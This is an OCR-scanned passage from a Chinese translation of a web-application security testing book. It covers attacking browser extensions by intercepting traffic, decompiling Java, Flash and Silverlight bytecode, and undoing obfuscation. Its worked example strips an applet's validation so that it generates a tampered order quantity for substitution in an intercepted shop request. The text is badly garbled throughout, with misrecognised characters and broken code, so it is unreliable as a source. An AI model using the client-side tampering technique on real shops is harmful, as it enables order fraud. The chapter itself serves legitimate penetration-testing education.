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Echo Mirage 就 是 一 个 这 样 的 工具 , 它 能 够 注入 进程 并 拦截 套 接 字 API 调 用 , 以 便 查看 并 修改 数据 ， 
然后 通过 网 络 传送 修改 后 的 数据 。 可 以 从 以 下 URL 下载 Echo Mirage: 


www.bindshell.net/tools/echomirage 





渗透 测试 步 双 





(1) 确保 代理 服务 侣 能 够 正确 拦截 浏览 带 扩 展 送 出 的 所 有 流量 。 如 有 必要 ， 使 用 咒 探 带 确 
定 任何 未 正确 拦截 的 流量 。 

(2) 如 果 客 户 端 组 件 使 用 标准 的 序列 化 方案 ,确保 拥有 解压 并 修改 序列 化 数据 所 需 的 工 
具 。 如 果 济 响 侣 组 件 使 用 专用 编码 或 加 密 机 制 , 则 需要 解 译 或 调试 该 组 件 , 对 其 进行 全 面 测 试 。 

(3) 检查 服务 页 返 回 的 触发 关键 客户 站 逻辑 的 啊 应 。 通 笛 ， 及 时 拦 稚 并 修改 服务 休 啊 应 能 
够 “解锁 ”客户 病 GUI， 从 而 轻松 发 现 并 执行 复杂 或 多 步 双 特权 操作 。 

(4) 如 于 应 用 程序 执行 不 得 由 客户 痪 组 件 执行 的 任何 关键 逻辑 或 事件 《如 在 赠 博 应 用 程序 
中 发 脾 或 摇 仍 子 )， 这 时 ， 可 以 寻找 执行 关键 逻辑 和 与 服务 带 通 信之 间 的 任何 联系 。 如 有 打 客 户 
闹 在 确定 事件 的 结 灯 时 不 需要 与 服务 带 进 行 通 信 ， 这 说 明 应 用 程序 肯定 存在 源 洞 。 




















5.3.4 反 编 译 浏览 器 扩展 


运 今 为 止 ， 在 对 浏览 强 扩 展 组 件 实 施 攻击 时 ， 最 彻 瓜 的 方法 ,是 反 编译 对 象 、 对 源 代码 进行 
全 面 分 析 、 修 改 源 代码 (如 有 必要 ) 以 改变 对 象 的 行为 ,然后 重新 编译 源 代码 。 如 前 所 述 ， 浏览 
医 扩 展 被 编译 成 学 市 码 。 字 市 公 是 一 种 由 相关 解释 旨 ( 如 Java 虚 拟 机 或 Flash 播 放 带 ) 执行 的 、 不 
依赖 于 特定 平台 的 高 级 二 进 制 表示 形式 ,每 种 浏览 套 扩 展 技术 都 使 用 它们 目 己 的 字 节 码 格式 。 因 
此 ， 浏 览 需 扩 展 能 够 在 解释 硕 本 身 可 运行 的 任何 平台 上 运行 。 

字 节 人 码 表 示 形 式 的 高 级 本 质 意 味 着 ,从 理论 上 讲 , 最 终 可 以 将 字 市 码 反 编译 成 类 似 于 最 初 的 
源 代码 的 内 容 。 但 是 ,学 市 码 可 能 采用 了 各 种 防御 机 制 ， 以 防止 反 编 译 , 或 者 输出 非常 难以 理解 
或 解释 的 反 编 译 代码 。 

尽管 字 节 但 采取 了 上 述 防 御 机 制 ,， 但 是 ,在 理解 和 攻击 浏览 套 扩 展 组 件 时 ， 反 编译 字 贡 人 码 仍 
然 是 首选 方法 。 通 过 反 编 详 字 节 码 ， 可 以 查看 客户 端 应 用 程序 的 业务 逻辑 、 访 问 它 的 全 部 功能 ， 
以 及 有 针对 性 地 修改 其 行为 。 

1. 下 载 字 市 码 

第 一 步 是 下 载 要 处 理 的 可 执行 字 节 码 。 一 般 情 况 下 ， 字 码 会 从 HITML 源 代码 【运行 浏 览 亲 
扩展 的 应 用 程序 页 面 ) 中 指定 的 URL 加 载 到 单独 的 文件 中 。Java applet 通 常 使 用 <applet> 标 签 加 
载 ， 其 他 组 件 则 使 用 <opject> 标 签 加 载 。 例 如 ， 

<applet code="CheckQuantity.class" codebase="/scripts" 


1d="CheckQuantityApplet'> 
</applet> 
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某 些 情况 下 ,加 载 字 节 码 的 URL 可 能 并 不 是 非常 明显 ,因为 组 件 可 能 使 用 不 同 浏 览 需 扩 展 框 
架 提 供 的 各 种 包装 脚本 ( wrapper script ) 进行 加 载 。 确 定 字 市 码 的 URL 的 男 一 种 方法 ， 是 在 浏览 
需 加 载 浏 览 需 扩展 后 ,在 代理 服务 硕 历 史记 录 中 查找 该 URL。 如 果 采 用 这 种 方法 ,需要 了 解 以 下 
两 个 可 能 的 问题 。 

口 一 些 代 理 服务 融 工 具 对 代理 服务 融 历 史记 录 应 用 过 滤 希 ， 以 隐 苇 渗 透 测试 员 通 稼 并 不 感 
兴趣 的 视图 项 目 ， 如 图 像 和 样式 表 文 件 。 如 果 找 不 到 与 浏览 硕 扩 展 字 和 但 有 关 的 请 求 ， 
那么 应 对 代理 服务 融 历 史记 录 显 示 过 滤 融 进行 修改 ， 以 显示 所 有 项 目 。 

D 通 浓 ， 相 比 于 网 像 等 其 他 静态 换 源 ， 浏 览 硕 会 在 缓存 中 更 多 地 存储 已 下 载 的 扩展 组 件 字 
节 码 。 如 果 浏 览 右 已 加 载 某 个 组 件 的 字 节 码 ， 那 么 ， 即 使 完全 刷 新 使 用 该 组 件 的 页 面 ， 
浏览 疮 也 不 会 再 次 请 求 该 组 件 。 在 这 种 情况 下 ， 可 能 需要 完全 清除 浏览 套 的 缓存 ， 关 闭 
每 一 个 浏览 融 实 例 ， 然 后 启动 新 的 浏 览 需 会 话 ， 才 能 强制 浏 览 需 再 次 请 求 字 节 人 三。 

确定 浏览 亏 扩 展 字 节 码 的 UREL 后 ， 只 需 将 该 URL 粘 贴 到 浏览 豆 的 地 址 栏 中 ,， 然 后， 浏览 硕 会 

提示 你 将 字 世 码 文件 保存 到 本 地 文件 系统 中 。 




















提示 “如果 已 在 Burp Proxy 历 史记 录 中 确定 了 与 字 节 码 有 关 的 请 求 ， 并 且 服 务 器 的 响 
Y 应 中 包含 完整 的 字 节 码 (而 没有 引用 以 前 缓存 的 副本 )， 这 时 ， 可 以 将 字 节 码 直 接 保 
存 到 Burp 内 的 文件 中 。 最 可 靠 的 方法 是 选择 响应 查看 器 中 的 “标题 ”( Herders ) 选项 


卡 ， 右 键 单 击 包含 响应 主体 的 下 方 窗 格 ， 然 后 从 上 下 文 菜单 中 选择 “复制 到 文件 ” 
( Copy to File )。 





2. 反 编 译 字 让 码 

字 世 人 码 通 稼 以 独立 文件 包 的 形式 发 布 , 可 能 需要 进行 解压 缩 才能 获得 单个 字 蔬 码 文 件 , 然后 
再 将 其 反 编 译 成 源 代码 。 

正常 情况 下 ，Java applet 打 包 成 .jar( Java 档 案 ) 文件 ，Silverlight 对 象 则 打包 成 .xap 文 件 。 这 
两 种 文件 均 使 用 zip 档 案 格式 , 因此 ,只 需 用 .zip 扩 展 名 重 命 名 这 些 文件 , 然后 使 用 任何 .zip 恋 取 带 
就 可 以 将 它们 解压 缩 成 单个 的 文件 。Java 字 节 人 码 包含 在 .class 文 件 中 ，Silverlight 字 节 码 包含 在 .dl 
文件 中 。 解 压 缮 相 关 文 件 包 后 ， 需 要 反 编 谋 这 些 文 件 才 能 获得 源 代码 。 

Flash 对 象 打 包 成 ,swf 文件 ， 在 使 用 反 编 译 希 之前， 不 需要 对 这 类 文件 进行 解压 缩 处 理 。 

实际 的 反 编译 字 市 码 需 要 使 用 一 些 特定 的 工具 ,这些 工 具 因 所 灯 用 的 浏览 絮 扩 展 技术 的 类 型 
而 异 ， 我 们 将 在 以 下 几 世 介绍 这 些 工 具 。 

@ Javal] | 

Java 字 节 码 可 以 使 用 称 为 Jad (Java 反 编译 融 ) 的 工具 反 编译 成 Java 源 代码， 该 工具 的 下 载 地 
址 如 下 : 

www.varaneckas.com/jJad 

@ Flash|| | 

Flash 字 市 公 可 以 反 编译 成 ActionScript 源 代码 。 男 一 种 更 加 有 效 的 方法 ， 是 将 字 市 公 反 编译 
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成 人 类 可 旋 的 格式 ， 而 不 是 将 其 完全 反 编 译 成 源 代 码 。 
要 反 编 译 和 反 汇 编 Flash， 可 以 使 用 以 下 工具 : 














口 Flasm www.nowrap.de/flasm:; 
DQ Flare www.nowrap.de/flare; 
口 SWFScan www.hp.com/go/swfscan( 此 工具 针对 Actionscript 2 和 Actionscript 3 )。 





@ Silverlightl| [| 

Silverlight 字 节 码 可 以 使 用 一 种 称 为 .NET Reflector 的 工具 反 编 译 成 源 代码 ， 该 工具 的 下 载 地 
址 为 : 

Www.red-gate.comyproducts/dotnet-developmentreflector/ 

3. 分 析 源 代码 

获得 组 件 的 源 代码 或 类 似 代 码 后 ,就 可 以 采取 各 种 方法 对 其 实施 攻击 。 通 第 ,第 一 步 是 查看 
源 代 码 ， 以 了 解 组 件 的 工作 机 制 及 其 包含 或 引用 的 功能 。 以 下 是 需要 寻找 的 一 些 项 目 : 

D 在 客户 端 发 生 的 输入 确认 或 其 他 安全 相关 逻辑 和 事件 ; 

口 在 回 服 务 硕 传送 数据 之 前 用 于 包 净 用 户 提交 的 数据 的 模糊 或 加 密 程 序 ; 

口 在 用 户 界面 中 不 可 见 ， 但 可 以 通过 修改 组 件 进行 解锁 的 “隐藏 的 ”客户 端 功能 ; 

口 对 以 前 未 通过 解析 应 用 程序 确定 的 服务 顶端 功能 的 引用 。 

通常 ,查看 源 代码 可 以 揭示 组 件 中 的 一 些 有 趣 的 功能 ,渗透 测试 员 希 望 修改 或 操纵 这 些 功 能 ， 
以 确定 潜在 的 安全 源 洞 。 希望 执行 的 操作 包括 : 删除 客户 问 输 入 确认 、 同 服务 右 提 交 未 标准 化 的 
数据 、 操 纵 客 户 闹 状态 或 事件 ， 或 者 直接 调用 组 件 中 的 功能 。 

如 以 下 几 节 所 述 ， 可 通过 各 种 方式 修改 组 件 的 行为 。 

e000000000000 

要 改变 组 件 的 行为 ,可 以 对 反 编 译 得 到 的 源 代码 进行 修改 , 重新 将 其 编 详 成 字 记 码 ， 然 后 在 
济 昂 各 中 执行 修改 后 的 组 件 。 需要 操纵 关键 的 客户 问 事 件 ， 如 在 赌博 应 用 程序 中 揪 骨 子 时 , 通常 
首选 这 种 方法 。 

要 重新 编译 源 代码 ， 需 要 使 用 与 采用 的 技术 有 关 的 开发 者 工具 。 

口 对 于 Java， 可 以 使 用 JDK 中 的 javac 程 序 重新 编译 修改 后 的 源 代 人 码 。 

口 对 于 Flash， 可 以 使 用 flasm 重 新 汇编 修改 后 的 字 节 码 ， 或 使 用 Adobe 的 某 个 Flash 开 发 套件 

重新 编译 修改 后 的 ActionScript 源 代码 。 

口 对 于 Silverlight， 可 以 使 用 Visual Studio 重 新 编译 修改 后 的 源 代码 。 

将 源 代 人 码 重 新 编 详 成 一 个 或 多 个 字 市 码 文件 后 ,如 采 采 用 的 技术 需要 ,可 能 需要 重新 打包 可 
分 配 的 文件 。 对 于 Java 和 Silverlight， 需 要 用 修改 后 的 字 节 码 文 件 蔡 换 已 解压 的 档案 中 的 文件 , 使 
用 zip 实 用 程度 重新 压缩 这 些 文 件 ， 然 后 根据 需要 将 文件 扩展 名 更 改 为 .jar 或 .xap。 

最 后 ， 需 要 将 修改 后 的 组 件 加 载 到 浏览 硕 中 ,使 所 做 的 更 改 在 测试 的 应 用 程序 中 生效 。 可 以 
通过 多 种 方式 达到 这 一 目的 。 

口 如 有 可 以 在 训 览 硕 的 磁盘 缓存 中 找到 包含 原始 可 执行 文件 的 物理 文件 ， 可 以 用 修改 后 的 

版 本 蔡 换 该 文件 ， 然 后 重新 局 动 浏览 希 。 但 是 ， 如 果 浏 览 希 并 不 对 每 个 缓存 的 资源 使 用 
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不 同 的 文件 ， 或 者 浏览 硕 只 是 将 扩展 组 件 缓存 在 内 存 中 ， 这 种 方法 可 能 无 法 生效 。 
口 可 以 使 用 拦截 代理 服务 需 修 改 加 载 组 件 页 面 的 源 代 码 ， 并 指定 另 一 个 指 回 本 地 文件 系统 
或 受 控 的 Web 服 务 右 的 URL。 正常 情况 下 ,这 种 方法 很 难 矢 效 ， 因 为 更 改 加 载 组 件 的 域 可 
能 会 违反 浏览 融 的 同 源 蛇 略 ， 而 且 可 能 需要 重新 配置 浏览 硕 ， 或 采用 其 他 方法 弱化 同 源 
宋 略 。 
口 可 以 使 浏览 需 从 原始 服务 需 重 新 加 载 组 件 〈 如 5.3.4 节 所 述 )， 使 用 代理 服务 需 拦 截 包含 可 
执行 文件 的 响应 ， 并 用 修改 后 的 版 本 蔡 换 消息 主体 。 在 Burp Proxy 中 ， 可 以 使 用 “从 文件 
中 粘贴 ”( Paste from File ) 上 下 文 菜 单项 达到 这 个 目的 。 通 第， 这 是 最 人 简单 的 方法 ， 也 是 
最 不 容易 遇 到 上 述 问题 的 方法 。 
enUDUUDDUDUDDDD 
有 些 时 候 , 并 不 需要 在 执行 组 件 的 过 程 中 修改 组 件 的 行为 。 例 如 ,一些 浏览 磊 扩 展 组 件 会 确 
认 用 户 提交 的 输入 ， 对 这 些 输入 进行 模糊 处 理 或 加 密 ， 然 后 将 其 传送 至 服务 硕 。 在 这 种 情况 下 ， 
可 以 对 组 件 进行 修改 , 使 其 对 任何 未 经 确认 的 输入 执行 必要 的 模糊 处 理 或 加 密 , 并 在 本 地 输出 结 
条。 然后 ,可 以 使 用 代理 服务 融 在 原始 组 件 提 交 经 过 确认 的 输入 时 拦截 相关 请 求 ， 并 用 修改 后 的 
组 件 输出 的 值 符 换 这 些 请 求 。 
要 实施 这 种 攻击 , 需要 对 在 相关 浏览 妖 扩 展 中 运行 的 原始 可 执行 文件 进行 修改 , 将 其 更 改 为 
可 以 在 命令 行 中 运行 的 独立 程序 。 进 行 修改 的 方式 因 所 采用 的 编程 语言 而 异 。 例 如 ， 在 Java 中 ， 
只 需要 实施 main 方 法 。"“Java applet: 可 用 示例 ”小 方 将 提供 相关 示例 。 
@ [| [| JavaScript[| [DDD 
在 某 些 情况 下 ， 并 不 需要 修改 组 件 的 学 届 码 。 相 反 ， 可 以 通过 修改 HTML 页 面 中 与 组 件 交 互 
的 JavaScript 来 达到 目的 。 
通过 查看 组 件 的 源 代码 , 可 以 确定 组 件 的 所 有 可 下 接 从 JavaScript 调 用 的 公共 方法 , 以 及 组 件 
处 理 这 些 方法 的 参数 的 方式 。 通常 , 除了 可 以 从 应 用 程序 页 面 调用 的 方法 外 , 还 存在 其 他 一 些 方 
法 ; 另外 ， 还 能 够 了 解 有 关 这 些 方法 的 参数 的 用 途 及 处 理 方 式 的 详细 信息 。 
例如 ,， 组件 可 能 会 公开 这 样 的 方法 : 调用 该 方法 可 以 启用 或 禁用 部 分 可 见 的 用 户 界面 。 使 用 
拦截 代理 服务 器 可 以 编辑 加 载 该 组 件 的 HTML 页 面 ， 修 改 其 中 的 JavaScript 或 在 其 中 添加 一 些 
JavaScript， 以 解锁 被 隐藏 的 部 分 界面 。 






























































渗透 测试 步骤 

(1) 使 用 上 述 技 巧 下 载 组 件 的 宇和 码 ， 解 压 字 节 但 ， 然 后 将 其 反 编 译 成 源 代码 。 

(2) 查看 相关 源 代 码 ， 了 解 组 件 的 执行 过 程 。 

(3) 如 果 组 件 包 含 任何 可 进行 操纵 以 实现 目的 的 公共 方法 ， 可 以 拦截 与 该 组 件 交 互 的 
HTML 响 应 ， 并 在 其 中 添加 一 些 JavaScript， 以 使 用 输入 调用 相应 的 方法 。 








(4) 如 有 条 组 件 中 不 包含 公共 方法 ， 可 以 通过 修改 组 件 的 源 代 码 ， 重 新 编 详 修 改 后 的 代码 ， 
然后 在 浏览 带 中 或 作为 独立 的 程序 执行 这 些 代码 ， 从 而 达到 目的 。 
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(5) 如 果 组 件 用 于 向 服务 器 提交 模糊 或 加 密 数据 ， 则 可 以 使 用 修改 后 的 组 件 向 服务 器 提交 
各 种 经 过 适当 模糊 处 理 的 攻击 字符 串 , 以 探查 其 中 的 漏洞 , 就 像 针 对 任何 其 他 参数 实施 攻击 一 样 。 





4. 字 市 码 模 糊 处 理 

由 于 攻击 者 可 轻松 反 编 详 字 市 公 以 恢复 其 源 代码 , 因而 人 们 开发 出 各 种 技巧 来 对 字 市 公 进 行 
模糊 人 处理。 经 过 模糊 处 理 的 字 市 码 更 难以 反 编 详 , 或 者 反 编译 后 得 到 的 是 可 能 造成 误导 或 无 效 的 
源 代 码 , 这 些 代码 非常 难以 理解 ,不 投入 大 量 精 力 无 法 进行 重新 编 详 .以 下 面 经 过 模糊 处 理 的 Java 
源 代码 为 例 : 


package myapp.interface; 








import myapp.class.public; 
import myapp.throw.throw; 
impPort if.if.if.if.else; 


import JjJava.awt.event.KeyEvent,; 


public class double extends public implements strict 
{ 
Public double(]j] j1) 
{ 
_mthif()}); 
_fldift = J]J1; 
) 
private void _mthif (ActionEvent actionevent,) 
| 
mthif(((KeyEvent) (null})}); 
switch{ fljdif. mthnew(}. fldif) 
{ 
CASeE 0: 
fldfloat.setEnabledlfalse),; 
fldboolean.setEnabled (false)}).; 
fldinstanceof,.setEnabled (false); 
fldint.setEnabled(false); 
break,; 








第 用 的 模糊 处 理 技巧 包括 以 下 几 种 。 

口 用 没有 意义 的 表达 式 ( 如 a、b、c ) 代替 有 意义 的 类 、 方 法 和 成 员 变 量 名 称 。 这 迫使 阅读 
肥 编 详 代 人 码 的 攻击 者 只 有 通过 人 研究 表达 式 的 使 用 方法 才能 确定 它们 的 用 途 ， 因 此 他 们 很 
难 明日 这 些 表 达 式 的 作用 。 

口 更 进一步 ， 一 些 模糊 处 理工 具 用 new 和 ;int 之 类 的 保留 关键 字 代替 项 目 名 称 。 虽 然 从 技术 
上 讲 ， 这 种 字 市 码 是 非法 的 , 但 大 多 数 虚 拟 机 ( VM ) 允许 使 用 这 种 非法 代码 ， 并 正 第 执 
行 它 们 。 不 过 ,尽管 反 编 详 角 能 够 处 理 非法 字 节 码 ， 但 这 样 得 到 的 源 代 码 比 前 一 种 方法 
生成 的 源 代码 更 加 难以 阅读 。 更 重要 的 是 ， 如 果 不 投入 大 量 精力 对 非法 命名 的 数据 项 统 
一 进行 重 命 名， 就 不 能 重新 编译 源 代码 。 
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口 许多 模糊 处 理工 具 删 除 字 节 码 中 不 必要 的 调试 和 元 信息 ， 包 括 源 文件 名 和 行 号 (使 栈 追 
蹊 缺乏 信息 )、 局 部 变量 名 称 ( 使 调试 更 研 烦 ) 和 内 部 类 信息 〈 使 反射 无 法 正 浓 进 行 )。 

口 增加 多 余 的 代码 ， 以 看 似 有 用 的 方式 建立 并 处 理 各 种 数据 ， 但 它们 与 应 用 程序 的 功能 实 
际 使 用 的 数据 并 无 关系 。 

口 使 用 跳 转 指令 ( jump instruction ) 对 整个 代码 的 执行 路 径 进行 令 人 费解 的 修改 ， 致 使 攻击 
者 在 阅读 反 编译 得 到 的 源 代 人 码 时 无 法 判别 执行 代码 的 逻辑 顺序 。 

口 引入 非法 的 编程 结构 ， 如 无 法 到 达 的 语句 和 缺少 return 语 句 的 代码 路 径 。 大 多 数 VM 旬 
许 在 字 市 码 中 出 现 这 种 结构 ， 但 如 果 不 更 正 非 法 代码 ， 就 无 法 重新 编译 反 编 码 得 到 的 源 
代码 。 




















渗透 测试 步 又 


应 对 字 节 码 模糊 处 理 的 有 效 策 略 取决 于 所 分 析 的 源 代 码 使 用 的 技巧 和 目的 。 以 下 提供 一 些 





建议 。 

(1) 不 必 完 全 理解 源 代码 , 只 需 查 看 组 件 中 是 否 包 含 公共 方法 。 哪些 方法 可 以 从 JavaScript 
中 调用 ， 它 们 的 签名 是 什么 ， 这 些 内 容 应 显而易见 。 可 以 通过 提交 各 种 输入 测试 上 述 方法 的 
1 

(2) 如 果 已 经 使 用 无 意义 的 表达 式 ( 并 非 编程 语言 保留 的 特殊 关键 字 ) 代替 类 、 方 法 和 成 
员 变 量 名 称 ， 可 以 使 用 许多 IDE 中 内 置 的 重 构 功能 (refactoring functionality ) 帮助 理解 代码 。 
通过 人 研究 数据 的 用 法 ， 可 以 给 它们 分 配 有 意义 的 名 称 。IDE 中 的 rename 工 具 可 以 帮助 完成 许多 
工作 ， 在 整个 代码 库 中 追踪 数据 的 用 法 并 对 每 一 个 数据 进行 重 命名 。 

(3) 选择 适当 的 选项 ， 在 模糊 处 理工 具 中 再 次 对 模糊 处 理 后 的 字 市 码 进行 模糊 人 处理， 这 样 
即 可 撤销 许多 模糊 处 理 。Jode 是 一 种 实用 的 模糊 处 理工 具 , 它 可 删除 由 其 他 模糊 处 理工 具 添 加 
的 多 余 代 码 路 径 ， 并 可 为 数据 分 配 唯一 的 名 称 ， 为 理解 模糊 处 理 后 的 名 称 提 供 帮 助 。 
































5. Java applet: 可 用 示例 

下 面 以 一 个 在 Java applet 中 执行 输入 确认 的 购物 应 用 程序 为 例 ， 简 要 说 明 如 何 反 编译 浏览 大 
扩展 。 

在 这 个 示例 中 ， 提 交 用 户 请 求 的 订购 数量 的 表单 如 下 所 示 : 


<form method="post" action="Shop.aspx?prod=2" onsubmit="return 











validateForm(this)"> 

<input type="hidden”" name="obfpad" 
value="klCGSB8X9x0WFVv9KGqlilePdaqaxHISUSRNnOoOJwPABRI9Zu1XSB3TokKkuUpPaF 1ig] 
UOQM8CIPSHJXP1drPOUOPWw630g9Z22vbyiOevPrkxF1iuUxA8Gn30o0lep2Lax6éIyuyEU 
D9SmG7C" > 

<Script> 

function validateForm!(theForm) 


( 
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var obfaquantity = 
document.CheckQuantityApplet .doCheck! 
theForm,.aquantity,.value, theForm.obfpad.value): 
if (obfauantity == undefined) 

{ 





alert{'Please enter a valid quantity.’'}: 
return false; 
) 
theForm.gquantity.value = obfquantity; 
return true; 
} 
</Script> 
<applet code="CheckQuantity.class'" codebase="/scripts”" width="0" 
height="0" 
id="CheckQuantityApplet'"></applet> 
Product: Samsung Multiverse <br/> 
Price: 399 <br/> 
Quantity: <input type="text" name="quantity"> (Maximum gquantity is S50,) 
<br/> 
<input type="submit" value="Buy"> 





</form> 

以 数量 ?提交 该 表单 时 ， 请 提出 以 下 请 求 ， 
POST /shop/l154/Shop.aspx?prod=2 HTTP/1.1 
Host: mdsec.net 














Content-Type: application/x-www-ftorm-urlencoded 
Content-Length: 77 


obfpad=klGSB8X9x0WFV9KGqlilePdqaxHISUSRNOJWPAdBRIgZU1IXSB3Tg9kupPaF1g9J]UQM8CIPS 
HJxXxpPidrPOuNO 
Pw630g92Z2vbyliOevPrkxFIiuUxA8Gn300l1ep2LaxéIyuyEUD9SmG7c&aquantity=4b282c510f£ 
776a405f465 

877090058575f445b536545401e4268475e105b2d1l15055c5d5204161000 


如 以 上 HTML 代 码 所 示 ， 提 交 表 单 时 ， 确认 脚 本 会 问 一 个 名 为 CheckQuantity 的 Java applet 传 
递 用 户 提 供 的 数量 和 obfpad 参 数 的 值 。 很 明显 ，applet 会 执行 必要 的 输入 确认 ， 并 癌 脚 本 返回 经 
过 模糊 处 理 的 数量 ,然后 脚本 再 将 该 数量 提交 给 服务 右 。 

由 于 服务 需 端 应 用 程序 确认 订购 数量 为 两 件 ， 因 此 ， 很 明显 ，quantity 参 数 会 以 某 种 形式 
包含 我 们 请 求 的 值 。 但是, 如 果 我 们 尝试 在 不 了 解 模 糊 算法 的 情况 下 修改 该 参数 , 攻击 将 会 失败 ， 
为 服务 各 无 法 正确 解析 我 们 提交 的 经 过 模糊 处 理 的 值 。 

在 这 种 情况 下 ， 可 以 使 用 之 前 介绍 的 方法 反 编译 Java applet， 以 此 了 人 解 它 的 工作 机 制 。 首先， 
需要 从 HTML 页 面 的 applet 标 签 中 指定 的 URL 下 载 applet 的 学 市 码 : 

/scripts/CheckQuantity.class 

由 于 可 执行 文件 没有 打包 成 ,jar 文件 ， 因 此 ， 不 需要 解压 这 个 文件 ， 可 以 直接 到 下 载 的 .class 
文件 运行 Jad: 
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C:\tmp>jad CheckOQuantity.class 

Parsing CheckQuantity.class...The class file version 1S 50.0 (onJy 45.3, 
46.0 and 47.0 are supported) 

Generating CheckQuantity.JjJad 

Couldn’'t fully decompile method doCheck 


Couldn’'t resolve all exception handlers in method doCheck 





Jad 将 经 过 反 编 详 的 源 代码 输出 为 jad 文 件 ， 可 以 在 任意 文本 编辑 从中 碍 看 该 文件 : 


// Decompliled by Jad v1.5.8f，CopvrIght 2001 Pavel Kouznetsov. 
// Jad home page: http://www. kpdus.com/jJad.html 
// Decompiler options: packimports'(3)} 





// Source File Name: CheckQuantity.java 


impPort JjJava.applet.Applet,; 


public class CheckOQuantity extends Applet 











{ 
Public CheckQuantity () 
{ 
} 
public String doCheck (String s8, String s1) 
{ 
Nit -1 宇 0 
1 = JInteger.parseInt(s).,; 
| 
return null; 
break MISSING BLOCK LAPBEL 26; 
Exception exception.; 
exception,; 
return null: 
String s2 = (new StringBuilder(})) .append("rand=") .append 
(Math.random(})) .append("&q=") .append (Integer.toString (i)}) .append 


("Schecked=true"} . toStringi'i: 


StringBuilder stringbuilder = new StringBuildert()}.,; 








toriint J 0 RB2., Lengthtyer 4 
{ 

String s3 = (new StringBuilder(}}) .append('0').append 
(Integer.toHexSstring( (byte}sl.charAt((] * 19 + 7) % sl.length{(}}) ~^ 
s2.charAt (Jj))) .toString(); 

int k = s3.length'(}): 

if(k > 2) 


Ss3 = s3.substring(k - 2, k);: 
stringbuilder.append{s3); 


return stringbuilder.toString{(); 
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如 经 过 反 编译 的 源 代 码 所 示 , Jad 进 行 了 大 量 的 反 编 译 工 作 , 而 且 该 applet 的 源 代 码 非 稼 简单 。 
使 用 用 户 提 供 的 quantity 参 数 和 应 用 程序 提供 的 obfpagd 参 数 调 用 docheck 方 法 时 ，applet 首 先 
确认 该 数量 是 否 为 介 于 1 到 50 之 间 的 有 效 数字 。 如 果 数 学 有 效 ， 它 会 使 用 URL 查 询 学 符 串 格式 创 
建 一 个 由 名 / 值 对 组 成 的 字符 串 ， 在 其 中 包含 经 过 确认 的 数量 。 最 后 ， 它 使 用 应 用 程序 提供 的 
obfpad 字 符 串 对 以 上 创建 的 字符 串 执 行 XOR 操 作 ， 对 该 字符 串 进行 模糊 处 理 。 这 是 一 种 相当 简 
单 而 第 用 的 方法 ， 它 通过 对 数据 进行 基本 的 模糊 处理 来 防止 简单 的 算 改 操作 。 

关于 如 何 反 编译 和 分 析 浏 览 强 扩展 组 件 的 源 代码 ， 我 们 已 经 介绍 了 各 种 方法 。 在 此 示例 中 ， 
解析 applet 的 最 简单 方法 如 下 所 示 : 

(1) 修改 aocheck 方 法 ， 取 消 输 入 确认 ， 以 便于 将 任意 字符 串 作 为 数量 提 区 给 服务 善 ; 

(2) 添加 一 个 main 方 法 ， 用 于 从 命令 行 执行 经 过 修改 的 组 件 。 该 方法 将 调用 经 过 修改 的 
doCheck 方 法 ， 并 在 控制 台 打 纯 经 过 模糊 处 理 的 结果 。 

进行 这 些 更 改 后 ， 源 代码 如 下 所 示 : 

Public class CheckOQuantity 

{ 






































public static void main(Sstring[] a) 
{ 
System.out.printlin(doCcheck(”999", 
"kIGSB8X9xOWFV9KGGqi lePdqaxHISUSRNOJWPABRIg9ZUiIXSB3Tg9kUPAaFigJUQM8CIPS5HIXPL 
drPOuQPw63o0gZ2vhyiQevPrkxFiuUxA8Gn3001ep2Lax6IyuyYEUD9 SmG7c")); 
} 


Public static String doCheck (String s, String s1) 
{ 


String 82 = (new StringBuilder(})} .append('"rangd="} .append 
(Math.random()) .append!("&g=") .append(s} .append 
("&checked=true") .toString(); 
StringBuilder stringbuilder = new StringBuilder ( ) : 
for(int ] = 0; J] < ss2.1length(); ]++) 
{ 

String s3 = (new StringBuilder(})}) .append('0o0') .appeng 
(Integer.toHexString((byte}sl.charAt((] * 19 + 7) % sil.length{(}}) ~^ 
s2.charAt (JjJ}}) .tosSstringt(),; 

int k = S3.1emncthl) 

if(k > 2) 


Ss3 = s3.substring(k - 2, k); 
stringbuilder.appengd(s3).; 
} 


return stringbuilder.toString!().,; 
J 
} 


经 过 修改 的 组 件 以 任意 数量 ( 999 ) 提供 经 过 模糊 处 理 的 有 效 子 符 串 。 需 要 注意 的 是 ， 可 以 
在 此 处 使 用 非 数 学 输入 ， 探 查 应 用 程序 中 是 否 存在 各 种 基于 输入 的 汤 洞 。 
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提示 。 Jad 程 序 以 ,jad 扩展 名 保存 其 反 编 译 的 源 代码 。 但 是 ， 如 果 布 望 修改 并 重新 编译 


YY | 源 代码 ， 需 要 用 ,java 扩展 名 重 命名 每 个 源 文件 。 





最 后 , 需要 使 用 Java SDK 昌 于 的 javac 编 译 需 重新 编译 源 代 人 码 , 然后 从 命令 行 执行 经 过 修改 的 
组 件 : 

C:\tmp>javac Checkouant1lIty .av 

C:\tmp>java CheckQuantity 

4b282c510f 7 7T6a455d425a78080]5c555f42585460464dlie42684c414als2ble0Obs5as20a 

145911171609 


现在 ， 经 过 修改 的 组 件 已 对 我 们 提交 的 任意 数量 〈9%999 ) 进行 了 必要 的 模糊 处 理 。 要 对 服务 
俘 实 施 攻 击 ， 只 需 使 用 有 效 的 输入 以 正解 方式 提 区 订单 , 使 用 代理 服务 郁 拦 规 生 成 的 请 求 ， 并 用 
经 过 修改 的 组 件 提 供 的 数量 蕉 换 经 过 模糊 处 理 的 数量 。 需要 注意 的 是 , 如 果 应 用 程序 在 每 次 加 载 
订单 时 都 发 布 一 个 新 的 模糊 包 (obfuscation pad )， 需 要 确保 返还 给 服务 锅 的 模糊 包 与 同时 提交 的 
用 于 对 数量 进行 模糊 处 理 的 模糊 包 相 匹配 。 


























尝试 访问 


以 下 示例 演示 了 上 述 攻 击 以 及 使 用 Silverlight 和 Flash 技 术 的 对 应 攻击 : 


http://mdsec.net/shop/154/ 
http://mdsec.net/shop/167/ 
http://mdsec.net/shop/179/ 


5.3.5 ”附加 调试 器 


要 了 解 和 攻击 浏览 硕 扩 展 ， 反 编译 是 最 全 面 可 靠 的 方法 。 但 是 ， 对 于 包含 成 干 上 万 行 代码 、 
功能 复杂 的 大 型 组 件 而 言 , 观察 组 件 的 执行 过 程 , 并 将 其 中 的 方法 和 类 与 界面 中 的 关键 功能 进行 
关联 ,往往 会 更 加 简单。 而 且 , 采用 这 种 方法 还 可 以 避免 在 解释 和 反 编译 经 过 模糊 处 理 的 字 市 码 
